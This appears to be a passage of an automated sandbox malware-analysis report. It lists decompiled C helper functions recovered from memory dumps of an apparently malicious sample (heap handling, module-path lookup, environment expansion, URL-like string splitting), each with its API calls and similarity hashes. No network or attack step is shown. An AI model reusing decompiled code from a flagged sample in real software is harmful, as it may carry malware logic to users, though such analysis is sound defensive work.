                                                                                                                                                                                                                                				if(_t1 == 0) {
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				SetEvent(_t1);
                                                                                                                                                                                                                                				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					SleepEx(0x64, 1);
                                                                                                                                                                                                                                					_t5 =  *0x2bbd2f4; // 0x0
                                                                                                                                                                                                                                					if(_t5 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                					if(_t11 > 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t6 =  *0x2bbd2a4; // 0x2d8
                                                                                                                                                                                                                                				if(_t6 != 0) {
                                                                                                                                                                                                                                					CloseHandle(_t6);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t7 =  *0x2bbd270; // 0x4f00000
                                                                                                                                                                                                                                				if(_t7 != 0) {
                                                                                                                                                                                                                                					HeapDestroy(_t7);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetEvent.KERNEL32(000002D8,00000001,02BB59AE), ref: 02BB1F52
                                                                                                                                                                                                                                • SleepEx.KERNEL32(00000064,00000001), ref: 02BB1F61
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(000002D8), ref: 02BB1F82
                                                                                                                                                                                                                                • HeapDestroy.KERNEL32(04F00000), ref: 02BB1F92
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4109453060-0
                                                                                                                                                                                                                                • Opcode ID: 3c062294296cf0ac8be80e52e8e88b561a9b048a9573206307c3fa2e8cbbf5ec
                                                                                                                                                                                                                                • Instruction ID: cdcef9c28d6062b58d16728776aa3a925fc5a40edd59fe7e94fbfb44b43f28bf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c062294296cf0ac8be80e52e8e88b561a9b048a9573206307c3fa2e8cbbf5ec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93F01C71F953139FDF22AB38D95CAA63AACEF156E17540A54B81CD71C0CBE4C810CA60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02B814E3(void* __ecx, WCHAR** _a4) {
                                                                                                                                                                                                                                				struct HINSTANCE__* _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				long _t10;
                                                                                                                                                                                                                                				long _t19;
                                                                                                                                                                                                                                				long _t20;
                                                                                                                                                                                                                                				WCHAR* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v8 =  *0x2b841b0;
                                                                                                                                                                                                                                				_t19 = 0x104;
                                                                                                                                                                                                                                				_t23 = E02B82020(0x208);
                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                					L8:
                                                                                                                                                                                                                                					_t20 = 8;
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					return _t20;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					L1:
                                                                                                                                                                                                                                					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                                                                                                                                                                                                                                					_v12 = _t10;
                                                                                                                                                                                                                                					if(_t10 == 0 || _t19 != _t10) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t19 = _t19 + 0x104;
                                                                                                                                                                                                                                					E02B81F0A(_t23);
                                                                                                                                                                                                                                					_t23 = E02B82020(_t19 + _t19);
                                                                                                                                                                                                                                					if(_t23 != 0) {
                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					_t20 = GetLastError();
                                                                                                                                                                                                                                					E02B81F0A(_t23);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *_a4 = _t23;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L9;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02B82020: HeapAlloc.KERNEL32(00000000,?,02B81593,00000030,747863F0,00000000), ref: 02B8202C
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,02B8160E,?), ref: 02B8150C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,02B8160E,?), ref: 02B8154A
                                                                                                                                                                                                                                  • Part of subcall function 02B81F0A: HeapFree.KERNEL32(00000000,?,02B81558,00000000,?,?,?,02B8160E,?), ref: 02B81F16
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, Offset: 02B80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881042118.0000000002B85000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 1691993961-1084903527
                                                                                                                                                                                                                                • Opcode ID: 24347e025d3ec36f0cb8f23710ff3ee3d39c0890f8ec88e2651843b151cf2c36
                                                                                                                                                                                                                                • Instruction ID: dab84ab7c513112743f6fc7fce8ab335b297c33d91683807ded9ad3580716e8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24347e025d3ec36f0cb8f23710ff3ee3d39c0890f8ec88e2651843b151cf2c36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201D872D22212A7C722765DDC449DFBBE9DF81B95B1501E2E90DE7100E770C942C7A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1EBA(CHAR* _a4) {
                                                                                                                                                                                                                                				long _t9;
                                                                                                                                                                                                                                				CHAR* _t10;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t10 = 0;
                                                                                                                                                                                                                                				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                					_t10 = E02BB5157(_t9);
                                                                                                                                                                                                                                					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                                                                                                                                                						E02BB53BB(_t10);
                                                                                                                                                                                                                                						_t10 = 0;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t10;
                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BB7528,73797325), ref: 02BB1ECB
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BB1EE5
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                                                                                                                • String ID: PGxt
                                                                                                                                                                                                                                • API String ID: 1564683301-789712160
                                                                                                                                                                                                                                • Opcode ID: 7592df280b5756e6ccbecd926a47b9046e5d64e54aade10f888bbee4bb3a4aaa
                                                                                                                                                                                                                                • Instruction ID: 53b5fab6b2fcaf35b089b1e9a18afae664db7d235d0564814f0912d3032301a9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7592df280b5756e6ccbecd926a47b9046e5d64e54aade10f888bbee4bb3a4aaa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0E04F3660253327823355AEAC58DEBDE9DEF92AE434501A5B90CD3210DFD0C911C6F1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E02BB18B3(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                				intOrPtr* _v8;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr* _t22;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				char* _t30;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t42;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t17 = __eax;
                                                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                				_t28 = _t2;
                                                                                                                                                                                                                                				_t34 = E02BB5157(_t2);
                                                                                                                                                                                                                                				if(_t34 != 0) {
                                                                                                                                                                                                                                					_t30 = E02BB5157(_t28);
                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                						E02BB53BB(_t34);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t39 = _a4;
                                                                                                                                                                                                                                						_t22 = E02BBA962(_t39);
                                                                                                                                                                                                                                						_v8 = _t22;
                                                                                                                                                                                                                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                							_a4 = _t39;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t26 = _t22 + 2;
                                                                                                                                                                                                                                							_a4 = _t22 + 2;
                                                                                                                                                                                                                                							_t22 = E02BBA962(_t26);
                                                                                                                                                                                                                                							_v8 = _t22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						if(_t22 == 0) {
                                                                                                                                                                                                                                							__imp__(_t34, _a4);
                                                                                                                                                                                                                                							 *_t30 = 0x2f;
                                                                                                                                                                                                                                							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                							__imp__(_t30, _v8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						 *_a8 = _t34;
                                                                                                                                                                                                                                						_t37 = 1;
                                                                                                                                                                                                                                						 *_a12 = _t30;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4,?,052F9618), ref: 02BB18BF
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                  • Part of subcall function 02BBA962: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02BB18ED,00000000,00000001,00000001,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618), ref: 02BBA970
                                                                                                                                                                                                                                  • Part of subcall function 02BBA962: StrChrA.SHLWAPI(?,0000003F,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4,?,052F9618,0000EA60,?), ref: 02BBA97A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02BB2E4A,00000000,00000000,747C81D0,052F9618,?,?,02BB21A4), ref: 02BB191D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,747C81D0), ref: 02BB192D
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BB1939
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3767559652-0
                                                                                                                                                                                                                                • Opcode ID: ce7068a515c0dd917ce47598d509f154f16482a20862fbb5fd44248ad63b5438
                                                                                                                                                                                                                                • Instruction ID: a59cca9ef839f2cb5a6b32a67bdac12944865835c4fb6ec4faef6ace5be30ce7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce7068a515c0dd917ce47598d509f154f16482a20862fbb5fd44248ad63b5438
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21C372900295EFCB135F78CC58AFA7FB9EF4A784B054095FA899B201D7B0C901CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1FCE(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                				_t18 = E02BB5157(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                				_v8 = _t18;
                                                                                                                                                                                                                                				if(_t18 != 0) {
                                                                                                                                                                                                                                					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,052F9364,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB1FDE
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(02BB29B1,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB1FE5
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,004F0053,747869A0,?,?,02BB29B1,004F0053,052F9364,?,?,?,?,?,?,02BBA080), ref: 02BB2005
                                                                                                                                                                                                                                • memcpy.NTDLL(747869A0,02BB29B1,00000002,00000000,004F0053,747869A0,?,?,02BB29B1,004F0053,052F9364), ref: 02BB2018
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2411391700-0
                                                                                                                                                                                                                                • Opcode ID: abe9b974f616c7513f847e31a274de4bd96ca5342695a7a6de216a569d2b9cec
                                                                                                                                                                                                                                • Instruction ID: ce7e375b0cebf5e9eda102a1ef5ac2b9cd3d4fb559d7974e313928b0468f3488
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abe9b974f616c7513f847e31a274de4bd96ca5342695a7a6de216a569d2b9cec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F03C36900119FB8B12DFA8CC44CDF7BADEF493947414062A90497201E771EA108BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(052F9B98,00000000,00000000,770CC740,02BBA73F,00000000), ref: 02BB2639
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 02BB2641
                                                                                                                                                                                                                                  • Part of subcall function 02BB5157: RtlAllocateHeap.NTDLL(00000000,00000000,02BB1259), ref: 02BB5163
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,052F9B98), ref: 02BB2655
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 02BB2660
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 74227042-0
                                                                                                                                                                                                                                • Opcode ID: 187ce6828b8aea169ab9aa0b6187ff98d1837b5df526b8f3bdef3288937b6bcb
                                                                                                                                                                                                                                • Instruction ID: 34f3d80bb64f146ed92b9dce26d69e2bf1bffe7e250280e0b9c00c67c125a583
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 187ce6828b8aea169ab9aa0b6187ff98d1837b5df526b8f3bdef3288937b6bcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE09233D012216B87139BE4AC48CAFBFADEF8A7903040817F600D3100C7A489118BE1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%